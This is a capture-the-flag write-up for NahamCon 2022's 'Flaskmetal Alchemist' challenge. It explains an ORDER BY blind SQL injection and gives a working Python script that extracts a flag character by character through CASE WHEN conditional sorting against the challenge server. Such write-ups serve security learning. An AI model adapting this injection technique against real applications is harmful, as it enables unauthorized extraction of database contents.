NahamCon CTF 2022: Flaskmetal Alchemist
TL;DR
- User input is embedded directly into an
ORDER BYclause. - Boolean logic in
CASE WHENallows blind SQL injection. - Response ordering leaks truth values.
- Flag extracted one character at a time via conditional sorting.
Video Walkthrough
Description
Edward has decided to get into web development, and he built this awesome application that lets you search for any metal you want. Alphonse has some reservations though, so he wants you to check it out and make sure it's legit.
Solution
import requests
import string
from bs4 import BeautifulSoup
url = 'http://challenge.nahamcon.com:30010/'
flag = 'flag{'
index = 6
# Until we've got the whole flag
while flag[-1] != '}':
for char in list('_' + string.ascii_lowercase + '}'): # Charset
# Post data, orderby is the SQLi (blind boolean)
data = {"search": "",
"order": f"(CASE WHEN (SELECT (SUBSTR(flag, {index}, 1)) from flag ) = '{char}' THEN name ELSE atomic_number END) DESC--"}
response = requests.post(url, data=data)
# Extract the first value
extracted = BeautifulSoup(response.text, features="lxml").td.contents[0]
# If it's 116 (Livermorium) then condition is false
if extracted != '116':
flag += char
print(flag)
index += 1
break